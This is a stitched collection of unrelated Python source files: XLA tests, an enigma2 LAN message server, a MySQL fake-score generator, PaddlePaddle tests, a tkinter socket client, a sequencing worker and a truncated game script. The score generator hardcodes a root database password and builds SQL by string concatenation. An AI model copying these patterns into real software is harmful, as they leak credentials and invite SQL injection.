NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]]) def testCallF32(self): c = self._NewComputation() c.Call( self._CreateMulF32By2Computation(), operands=(c.ConstantF32Scalar(5.0),)) self._ExecuteAndCompareClose(c, expected=10.0) def testCallF64(self): c = self._NewComputation() c.Call( self._CreateMulF64By2Computation(), operands=(c.ConstantF64Scalar(5.0),)) self._ExecuteAndCompareClose(c, expected=10.0) def testMapEachElementToS32Constant(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantS32Computation(), [0]) self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1]) def testMapEachElementToS64Constant(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantS64Computation(), [0]) self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1]) def testMapMulBy2F32(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateMulF32By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0]) def testMapMulBy2F64(self): c = self._NewComputation() c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateMulF64By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0]) def testSimpleMapChainF32(self): # Chains a map of constant-f32 with a map of mul-by-2 c = self._NewComputation() const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantF32Computation(), [0]) c.Map([const_f32], self._CreateMulF32By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0]) def testSimpleMapChainF64(self): # Chains a map of constant-f64 with a map of mul-by-2 c = self._NewComputation() const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))], self._CreateConstantF64Computation(), [0]) c.Map([const_f64], self._CreateMulF64By2Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0]) def testDivVectorsWithMapF32(self): c = self._NewComputation() c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])), c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))), self._CreateBinaryDivF32Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0]) def testDivVectorsWithMapF64(self): c = self._NewComputation() c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])), c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))), self._CreateBinaryDivF64Computation(), [0]) self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0]) def testSelectAndScatterF32(self): c = self._NewComputation() c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])), select=self._CreateBinaryGeF32Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID, source=c.Constant(NumpyArrayF32([[0.1, 0.2]])), init_value=c.Constant(NumpyArrayF32(1)), scatter=self._CreateBinaryAddF32Computation()) self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]]) def testSelectAndScatterF64(self): c = self._NewComputation() c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])), select=self._CreateBinaryGeF64Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID, source=c.Constant(NumpyArrayF64([[0.1, 0.2]])), init_value=c.Constant(NumpyArrayF64(1)), scatter=self._CreateBinaryAddF64Computation()) self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]]) def testReduce1DtoScalarF32(self): c = self._NewComputation() c.Reduce( operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=10) def testReduce1DtoScalarF64(self): c = self._NewComputation() c.Reduce( operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=10) def testReduce2DTo1DDim0F32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=[5, 7, 9]) def testReduce2DTo1DDim0F64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[0]) self._ExecuteAndCompareClose(c, expected=[5, 7, 9]) def testReduce2DTo1DDim1F32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=[1]) self._ExecuteAndCompareClose(c, expected=[6, 15]) def testReduce2DTo1DDim1F64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=[1]) self._ExecuteAndCompareClose(c, expected=[6, 15]) def testReduce3DAllPossibleWaysF32(self): input_array = self._MakeSample3DArrayF32() def _ReduceAndTest(*dims): c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), dimensions=dims) self._ExecuteAndCompareClose( c, expected=np.sum(input_array, axis=tuple(dims))) _ReduceAndTest(0) _ReduceAndTest(0) _ReduceAndTest(0, 1) _ReduceAndTest(0, 2) _ReduceAndTest(1, 2) _ReduceAndTest(0, 1, 2) def testReduce3DAllPossibleWaysF64(self): input_array = self._MakeSample3DArrayF64() def _ReduceAndTest(*dims): c = self._NewComputation() c.Reduce( operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), dimensions=dims) self._ExecuteAndCompareClose( c, expected=np.sum(input_array, axis=tuple(dims))) _ReduceAndTest(0) _ReduceAndTest(0) _ReduceAndTest(0, 1) _ReduceAndTest(0, 2) _ReduceAndTest(1, 2) _ReduceAndTest(0, 1, 2) def testReduceWindowValidUnitStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]]) def testReduceWindowSameUnitStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.SAME) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]]) def testReduceWindowValidGeneralStridesF32(self): input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF32Scalar(0), computation_to_apply=self._CreateBinaryAddF32Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 9.]]) def testReduceWindowValidUnitStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]]) def testReduceWindowSameUnitStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 1), padding=xla_client.PaddingType.SAME) self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]]) def testReduceWindowValidGeneralStridesF64(self): input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) c = self._NewComputation() c.ReduceWindow(operand=c.Constant(input_array), init_value=c.ConstantF64Scalar(0), computation_to_apply=self._CreateBinaryAddF64Computation(), window_dimensions=(2, 1), window_strides=(1, 2), padding=xla_client.PaddingType.VALID) self._ExecuteAndCompareClose(c, expected=[[5., 9.]]) def testWhileF32(self): cond = self._CreateTestF32Lt10Computation() body = self._CreateMulF32By2Computation() c = self._NewComputation() init = c.ConstantF32Scalar(1.) c.While(cond, body, init) self._ExecuteAndCompareClose(c, expected=16.) def testWhileF64(self): cond = self._CreateTestF64Lt10Computation() body = self._CreateMulF64By2Computation() c = self._NewComputation() init = c.ConstantF64Scalar(1.) c.While(cond, body, init) self._ExecuteAndCompareClose(c, expected=16.) def testInfeedS32Values(self): to_infeed = NumpyArrayS32([1, 2, 3, 4]) c = self._NewComputation() c.Infeed(xla_client.Shape.from_numpy(to_infeed[0])) compiled_c = c.Build().CompileWithExampleArguments() for item in to_infeed: xla_client.transfer_to_infeed(item) for item in to_infeed: result = compiled_c.Execute() self.assertEqual(result, item) def testInfeedThenOutfeedS32(self): to_round_trip = NumpyArrayS32([1, 2, 3, 4]) c = self._NewComputation() x = c.Infeed(xla_client.Shape.from_numpy(to_round_trip[0])) c.Outfeed(x) compiled_c = c.Build().CompileWithExampleArguments() for want in to_round_trip: execution = threading.Thread(target=compiled_c.Execute) execution.start() xla_client.transfer_to_infeed(want) got = xla_client.transfer_from_outfeed( xla_client.Shape.from_numpy(to_round_trip[0])) execution.join() self.assertEqual(want, got) class ErrorTest(LocalComputationTest): def setUp(self): self.f32_scalar_2 = NumpyArrayF32(2.0) self.s32_scalar_2 = NumpyArrayS32(2) def testInvokeWithWrongElementType(self): c = self._NewComputation() c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata()) c.ParameterFromNumpy(self.s32_scalar_2) c.ClearOpMetadata() self.assertRaisesRegexp( RuntimeError, r"Invalid argument shape.*xla_client_test.py.*" r"expected s32\[\], got f32\[\]", lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2])) if __name__ == "__main__": unittest.main()
MessageServer.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' Copyright (C) 2011 cmikula In case of reuse of this source code please do not remove this copyright. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. For more information on the GNU General Public License see: <http://www.gnu.org/licenses/>. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. ''' from __future__ import print_function from __future__ import absolute_import import SocketServer import socket serverInstance = None def getIpAddress(iface): interfaces = [] # parse the interfaces-file try: fp = open('/etc/network/interfaces', 'r') interfaces = fp.readlines() fp.close() except: print("[AdvancedMovieSelection] interfaces - opening failed") currif = "" for i in interfaces: split = i.strip().split(' ') if (split[0] == "iface"): currif = split[1] if (currif == iface): #read information only for available interfaces if (split[0] == "address"): return split[1] return None class TCPHandler(SocketServer.BaseRequestHandler): """ The RequestHandler class for our server. It is instantiated once per connection to the server, and must override the handle() method to implement communication to the client. """ def handle(self): try: from .Client import MessageQueue # self.request is the TCP socket connected to the client data = self.request.recv(1024).strip() #print str(self.client_address[0]), "wrote" #print(data) self.request.send(MessageQueue.getRequest(data)) except Exception as e: print(e) class MessageServer(): def __init__(self): global serverInstance if serverInstance: raise Exception("Only one instance of MessageServer is allowed") self.server = None self.active_clients = [] self.host = getIpAddress('eth0') self.port = 20000 self.ip_from = 1 self.ip_to = 254 def start(self): if not self.host: print("[AdvancedMovieSelection] Could not start server, no static host ip") return import threading self.shutdown() self.server = SocketServer.TCPServer((self.host, self.port), TCPHandler) self.t = threading.Thread(target=self.server.serve_forever) self.t.setDaemon(True) # don't hang on exit self.t.start() print("[AdvancedMovieSelection] Server started:", self.host, self.port) def shutdown(self): if self.server: self.server.shutdown() print("[AdvancedMovieSelection] Server stopped:") def reconnect(self, host=None, port=None): if host: self.host = host if port: self.port = port self.start() def getHost(self): return self.host def getPort(self): return self.port def setPort(self, port): self.port = port def findClients(self): from .Client import Client self.active_clients = [] ip = self.host.split(".") ip = "%s.%s.%s" % (ip[0], ip[1], ip[2]) for x in list(range(self.ip_from, self.ip_to + 1)): try: # Connect to server and send data host = "%s.%s" % (ip, x) print("[AdvancedMovieSelection] Try connect to: %s:%s" % (host, self.port)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.1) sock.connect((host, self.port)) sock.close() client = Client(host, self.port) if client.getDeviceName() != "Error": self.active_clients.append(client) except: pass finally: sock.close() def startScanForClients(self): import threading t = threading.Thread(target=self.findClients) t.start() def getClients(self): return self.active_clients def setSearchRange(self, ip_from, ip_to): if ip_from > ip_to or ip_to >= 255: return self.ip_from = ip_from self.ip_to = ip_to serverInstance = MessageServer()
achievement_gen.py
from faker import Faker import random import numpy as np import pymysql import sys import time # 生成随机姓名 def get_random_name(): return Faker().name() golad_list = [] def get_random_id(): id_list = [] num_list = "" for i in range(15): id_list.append(random.randint(1, 9)) for i in id_list: num_list += (str(i)) return num_list # 生成随机成绩 def get_random_score(): random_score = np.random.normal(96, 6) # 正态分布 return int(random_score) # 生成随机综合成绩 def get_random_score2(): random_score2 = np.random.normal(250, 8) # 正态分布 return int(random_score2) def get_fake_data(): temp = sys.stdout # 记录当前输出指向,默认是consle for i in range(60): # 这里以生成60条数据为测试 id_num = get_random_id() name = get_random_name() Chinese = get_random_score() Math = get_random_score() English = get_random_score() Zonghe = get_random_score2() Total = Chinese + Math + English + Zonghe with open("G:\python-learning\mysql\FakeData.txt", "a")as f: # 两次输出重定向 sys.stdout = f # 输出指向txt文件 print(id_num, name, Chinese, Math, English, Zonghe, Total) sys.stdout = temp # 输出重定向回consle config = { "host": "127.0.0.1", "user": "root", "password": "Niejing", "database": "compateall" } # 200 13 # 500 35.46814322471619 数据量5000,总共耗时:351.85799074172974 # 1000 69.13909006118774 数据量9000,总共耗时:615.8100788593292 def wayOne(g, s): start = time.time() sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values(%s,%s,%s,%s,%s,%s,%s) " db = pymysql.connect(**config) cursor = db.cursor() group = g size = s id_num = get_random_id() name = get_random_name() Chinese = get_random_score() Math = get_random_score() English = get_random_score() Zonghe = get_random_score2() Total = Chinese + Math + English + Zonghe for j in range(group): gStart = time.time() usersvalues = [] for i in range(size): # 这里以生成60条数据为测试 key = str(j) + str(i) usersvalues.append( (str(id_num) + key, str(name) + key, Chinese, Math, English, Zonghe, Total)) cursor.executemany(sql, usersvalues) db.commit() print("第%s批结束,耗时%s" % (str(j + 1), str(time.time() - gStart))) cursor.close() db.close() print("数据量%s,总共耗时:%s" % (str(group * size), str(time.time() - start))) def wayTwo(): start = time.time() g = 5 db = pymysql.connect(**config) cursor = db.cursor() for g in range(1): sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values" gStart = time.time() for i in range(989): id_num = get_random_id() name = get_random_name() Chinese = get_random_score() Math = get_random_score() English = get_random_score() Zonghe = get_random_score2() Total = Chinese + Math + English + Zonghe sql += "(" + str(id_num) + ",'" + str(name) + "'," + str(Chinese) + "," + str(Math) + "," + str( English) + "," + str(Zonghe) + "," + str(Total) + ")," id_num = get_random_id() name = get_random_name() Chinese = get_random_score() Math = get_random_score() English = get_random_score() Zonghe = get_random_score2() Total = Chinese + Math + English + Zonghe sql += "(" + str(id_num) + ",'" + str(name) + "'," + str(Chinese) + "," + str(Math) + "," + str( English) + "," + str(Zonghe) + "," + str(Total) + ")" cursor.execute(sql) # print(sql) sql = "" db.commit() print("第%s批结束,耗时%s" % (str(10000), str(time.time() - gStart))) cursor.close() db.close() print("数据量%s,总共耗时:%s" % (str(g * 10000), str(time.time() - start))) def theadInsert(size, j): print("runing" + str(j)) db = pymysql.connect(**config) cursor = db.cursor() gStart = time.time() usersvalues = [] sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values(%s,%s,%s,%s,%s,%s,%s) " for i in range(size): # 这里以生成60条数据为测试 id_num = get_random_id() name = get_random_name() Chinese = get_random_score() Math = get_random_score() English = get_random_score() Zonghe = get_random_score2() Total = Chinese + Math + English + Zonghe usersvalues.append((id_num, name, Chinese, Math, English, Zonghe, Total)) cursor.executemany(sql, usersvalues) db.commit() cursor.close() db.close() print("第%s批结束,耗时%s" % (str(j + 1), str(time.time() - gStart))) if __name__ == '__main__': wayOne(1, 100) # for j in range(group): # t = threading.Thread(target=theadInsert, args=(size, j)) # t.start() # # print("数据量%s,总共耗时:%s" % (str(group * size), str(time.time() - start)))
test_imperative_data_loader_exit_func.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys import signal import unittest import multiprocessing import time import paddle.compat as cpt from paddle.fluid.framework import _test_eager_guard if sys.version_info[0] == 2: import Queue as queue else: import queue from paddle.fluid.reader import multiprocess_queue_set, _cleanup, CleanupFuncRegistrar # NOTE: These special functions cannot be detected by the existing coverage mechanism, # so the following unittests are added for these internal functions. class TestDygraphDataLoaderCleanUpFunc(unittest.TestCase): def setUp(self): self.capacity = 10 def func_test_clear_queue_set(self): test_queue = queue.Queue(self.capacity) global multiprocess_queue_set multiprocess_queue_set.add(test_queue) for i in range(0, self.capacity): test_queue.put(i) _cleanup() def test_clear_queue_set(self): with _test_eager_guard(): self.func_test_clear_queue_set() self.func_test_clear_queue_set() class TestRegisterExitFunc(unittest.TestCase): # This function does not need to be implemented in this case def none_func(self): pass def func_test_not_callable_func(self): exception = None try: CleanupFuncRegistrar.register(5) except TypeError as ex: self.assertIn("is not callable", cpt.get_exception_message(ex)) exception = ex self.assertIsNotNone(exception) def test_not_callable_func(self): with _test_eager_guard(): self.func_test_not_callable_func() self.func_test_not_callable_func() def func_test_old_handler_for_sigint(self): CleanupFuncRegistrar.register( function=self.none_func, signals=[signal.SIGINT]) def test_old_handler_for_sigint(self): with _test_eager_guard(): self.func_test_old_handler_for_sigint() self.func_test_old_handler_for_sigint() def func_test_signal_wrapper_by_sigchld(self): # This function does not need to be implemented in this case def __test_process__(): pass CleanupFuncRegistrar.register( function=self.none_func, signals=[signal.SIGCHLD]) exception = None try: test_process = multiprocessing.Process(target=__test_process__) test_process.start() time.sleep(3) except SystemExit as ex: exception = ex self.assertIsNotNone(exception) def test_signal_wrapper_by_sigchld(self): with _test_eager_guard(): self.func_test_signal_wrapper_by_sigchld() self.func_test_signal_wrapper_by_sigchld() if __name__ == '__main__': unittest.main()
gui_socket_client.py
import socket import time from tkinter import * import threading # methods # Quit functionality for GUI def quit(): global root root.destroy() # start the socket listener thread def start_thread(): print("start thread") global username global username_box global status_label global skip_button global t username = username_box.get() t = threading.Thread(target=listen) t.daemon = True t.start() username_label.pack_forget() username_box.pack_forget() login_button.pack_forget() status_label = Label(root, text = "connecting as {}".format(username)) status_label.pack() skip_button = Button(root, text="skip", command=skip_wait) skip_button.pack() skip_button['state'] = DISABLED # skips the pause signal received from the server def skip_wait(): global wait_time wait_time = 0 # utility to set UI message def set_label(data): global status_label status_label.config(text=str(data)) # listen to the server over the socket def listen(): try: try: global wait_time global skip_button s = socket.socket() s.connect((host, port)) # request with the username s.send(str.encode(username)) data = s.recv(1024).decode('utf-8') set_label(data) print(data + " as " + username) if data == "Username already in use..": set_label(data) username_label.pack() username_box.pack() login_button.pack() skip_button.pack_forget() s.close() time.sleep(2) status_label.pack_forget() return except Exception as e: set_label("Connection could not be established.." + str(e)) # username available and connected to server root.title(username) # set the window title to username once connected # keep listening to the server and send responses while True: print("data receiving...") data = s.recv(1024).decode('utf-8') wait_time = int(data) if data == "check": s.send(str.encode("check_received")) continue set_label(data) count = 0 while wait_time > 0: count+=1 skip_button['state'] = NORMAL time.sleep(1) wait_time-=1 set_label(wait_time) skip_button['state'] = DISABLED set_label("Listening for server..") s.send(str.encode("Client {} waited {} seconds for server.".format(username, str(count)))) except Exception as e: set_label("connection Lost...") # code # socket initialization s = socket.socket() host = 'localhost' port = 9999 username = "user1" # GUI widgets root = Tk() root.title('Client') root.geometry("370x120") username_label = Label(root, text="Enter username") username_label.pack() username_box = Entry(root) username_box.pack() login_button = Button(root, text="logon", command=start_thread) login_button.pack() quit_button = Button(root, command=quit, text="Quit") quit_button.pack() # GUI loop root.mainloop()
compare_scans.py
import logging import sys import time from threading import Thread from pgnumbra.config import cfg_get, cfg_init from pgnumbra.console import print_status from pgnumbra.proxy import init_proxies from pgnumbra.utils import load_accounts_file logging.basicConfig(filename="compare_scans.log", level=logging.INFO, format='%(asctime)s [%(threadName)16s][%(module)14s][%(levelname)8s] %(message)s') log = logging.getLogger(__name__) # Silence some loggers logging.getLogger('pgoapi').setLevel(logging.WARNING) scanners = [] # =========================================================================== log.info("PGNumbra CompareScans starting up.") cfg_init() lat = cfg_get('latitude') lng = cfg_get('longitude') if not cfg_get('accounts_file'): log.error("Comparing accounts only works with --accounts-file.") sys.exit(1) init_proxies() accounts = load_accounts_file() for acc in accounts: t = Thread(target=acc.run) t.daemon = True t.start() # Start thread to print current status and get user input. t = Thread(target=print_status, name='status_printer', args=(accounts,)) t.daemon = True t.start() # Dummy endless loop. while True: time.sleep(1)
worker.py
import multiprocessing import queue from queue import Queue import sys from spats_shape_seq.pair import Pair from spats_shape_seq.parse import FastqWriter, SamWriter from spats_shape_seq.util import _debug, _warn from spats_shape_seq.mask import PLUS_PLACEHOLDER, MINUS_PLACEHOLDER class SpatsWorker(object): '''Manages multiprocessing aspects of Spats. ''' def __init__(self, run, processor, pair_db, result_set_id = None, force_mask = None): self._run = run self._processor = processor self._pair_db = pair_db self._result_set_id = result_set_id self._force_mask = force_mask self._workers = [] def _make_result(self, ident, pair, tagged = False): res = [ ident, pair.target.rowid if pair.target else None, pair.mask_label, pair.site if pair.has_site else -1, pair.end if pair.has_site else -1, len(pair.mutations) if pair.mutations else -1, pair.multiplicity, pair.failure ] if tagged: res.append(pair.tags) return res def _worker(self, worker_id): try: processor = self._processor processor.reset_counts() if self._pair_db: self._pair_db.worker_id = worker_id writeback = bool(self._result_set_id) tagged = processor.uses_tags use_quality = self._run._parse_quality pair = Pair() while True: pairs = self._pairs_to_do.get() if not pairs: break results = [] for lines in pairs: if not pair.set_from_data(lines[3], str(lines[1]), str(lines[2]), lines[0]): print('\nskipping empty pair: {}'.format(lines[3])) continue if use_quality: pair.r1.quality = str(lines[4]) pair.r2.quality = str(lines[5]) if self._force_mask: pair.set_mask(self._force_mask) processor.process_pair(pair) #if pair.failure: # print('FAIL: {}'.format(pair.failure)) if writeback: results.append(self._make_result(lines[3], pair, tagged)) if writeback: self._results.put(results) if not self._run.quiet: sys.stdout.write('.')#str(worker_id)) sys.stdout.flush() self._pairs_done.put(processor.counters.count_data()) except: print("**** Worker exception, aborting...") raise def _createWorkers(self, num_workers): for i in range(num_workers): worker = multiprocessing.Process(target = self._worker, args = (i,)) self._workers.append(worker) worker.start() if not self._run.quiet: print("Created {} workers".format(num_workers)) def _joinWorkers(self): for w in self._workers: w.join() def run(self, pair_iterator): num_workers = max(1, self._run.num_workers or multiprocessing.cpu_count()) if 1 == num_workers: self.run_simple(pair_iterator) return self._pairs_to_do = multiprocessing.Queue(maxsize = 2 * num_workers) self._pairs_done = multiprocessing.Queue() self._results = multiprocessing.Queue() self._createWorkers(num_workers) quiet = self._run.quiet more_pairs = True pair_db = self._pair_db writeback = bool(self._result_set_id) num_batches = 0 total = 0 if writeback: result_set_id = self._result_set_id def put_batch(): pair_info = next(pair_iterator) self._pairs_to_do.put(pair_info) if not quiet: sys.stdout.write('^') sys.stdout.flush() return sum(p[0] for p in pair_info) # need to take into account multiplicity for reads def write_results(): all_results = [] num_batches = 0 try: while True: all_results.extend(self._results.get(True, 0.01)) num_batches += 1 if not quiet: sys.stdout.write('v') sys.stdout.flush() except queue.Empty: pass if all_results: pair_db.add_results(self._result_set_id, all_results) return num_batches while more_pairs: try: cur_count = 0 while cur_count < num_workers or num_batches < 2 * num_workers: total += put_batch() num_batches += 1 cur_count += 1 if writeback: num_batches -= write_results() except StopIteration: more_pairs = False except queue.Empty: pass if writeback: while num_batches > 0: num_batches -= write_results() # put signal objects to indicate we're done for i in range(num_workers): self._pairs_to_do.put(None) processor = self._processor targets = { t.name : t for t in processor._targets.targets } accumulated = 0 def accumulate_counts(): num_accumulated = 0 try: while 1 < num_workers: count_data, vect_data = self._pairs_done.get_nowait() processor.counters.update_with_count_data(count_data, vect_data) num_accumulated += 1 if not quiet: sys.stdout.write('x') sys.stdout.flush() except queue.Empty: pass return num_accumulated while accumulated < num_workers: accumulated += accumulate_counts() if not self._run.quiet: print("\nAggregating data...") self._joinWorkers() processor.counters.total_pairs = total #if self._pair_db: # processor.counters.unique_pairs = self._pair_db.unique_pairs() def run_simple(self, pair_iterator): quiet = self._run.quiet run_limit = self._run._run_limit more_pairs = True pair_db = self._pair_db writeback = bool(self._result_set_id) sam = bool(self._run.generate_sam) channel_reads = bool(self._run.generate_channel_reads) use_quality = self._run._parse_quality total = 0 if writeback: result_set_id = self._result_set_id processor = self._processor if self._pair_db: self._pair_db.worker_id = 0 tagged = processor.uses_tags pair = Pair() if sam: sam_writer = SamWriter(self._run.generate_sam, processor._targets.targets) if channel_reads: plus_writer = FastqWriter('R1_plus.fastq', 'R2_plus.fastq') minus_writer = FastqWriter('R1_minus.fastq', 'R2_minus.fastq') while more_pairs: try: while True: pair_info = next(pair_iterator) if not quiet: sys.stdout.write('^') sys.stdout.flush() results = [] for lines in pair_info: if not pair.set_from_data(lines[3], str(lines[1]), str(lines[2]), lines[0]): print('\nskipping empty pair: {}'.format(lines[3])) continue if use_quality: pair.r1.quality = str(lines[4]) pair.r2.quality = str(lines[5]) if self._force_mask: pair.set_mask(self._force_mask) try: processor.process_pair(pair) except: print("**** Error processing pair: {} / {}".format(pair.r1.original_seq, pair.r2.original_seq)) raise if sam: sam_writer.write(pair) if channel_reads and pair.has_site: if pair.mask_label == self._run.masks[0] or pair.mask_label == PLUS_PLACEHOLDER: plus_writer.write(pair) else: minus_writer.write(pair) total += pair.multiplicity if writeback: results.append(self._make_result(lines[3], pair, tagged)) if not quiet: sys.stdout.write('v') sys.stdout.flush() if results: pair_db.add_results(self._result_set_id, results) if not quiet: sys.stdout.write('.') sys.stdout.flush() if run_limit and total > run_limit: raise StopIteration() except StopIteration: more_pairs = False if not self._run.quiet: print("\nAggregating data...") processor.counters.total_pairs = total if self._pair_db: processor.counters.unique_pairs = self._pair_db.unique_pairs()
mainscript.py
# # Parley Who Vertigo # Copyright 2016, 2017 Thomas Perl, Josef Who # # Permission to use, copy, modify, and/or distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH # REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND # FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, # INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM # LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR # OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR # PERFORMANCE OF THIS SOFTWARE. # from gameflow import GameFlow from coroutine import Coroutine from color import Color, to_rgba32 import psmovecolor import os import time import math import random import threading import sdl import sdlmixer import eglo import fontaine class MainScript(object): def __init__(self, api, use_chip): self.api = api self.use_chip = use_chip self.coroutines = [] if self.use_chip: self._render_thread = threading.Thread(target=self.ui_loop) self._render_thread.setDaemon(True) self._render_thread.start() else: self.ui_setup() self.sounds = {} def ui_setup(self): if self.use_chip: self.eglo = eglo.EGLO() else: self.eglo = None scale = 